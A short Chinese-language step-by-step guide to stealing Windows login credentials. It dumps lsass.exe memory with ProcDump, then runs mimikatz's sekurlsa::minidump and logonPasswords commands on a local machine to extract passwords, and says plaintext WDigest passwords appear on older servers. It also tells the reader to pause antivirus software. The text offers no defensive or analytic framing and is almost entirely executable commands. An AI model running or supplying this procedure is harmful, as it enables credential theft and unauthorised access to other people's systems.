1、在微软官方网站下载ProcDump软件,下载地址如下:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
2、在win服务器上以管理员执行命令
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
此处只能导出在线的用户信息
3、生成lsass.dmp文件,将文件复制到本地计算机
4、在GitHub上下载mimikatz程序
https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210810-2
5、在本地计算机执行如下命令,此处需要暂停杀毒软件
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" > pssword.txt exit
6、查看pssword.txt文件中wdigest :中Password字段,win2008服务器以下版本为明文密码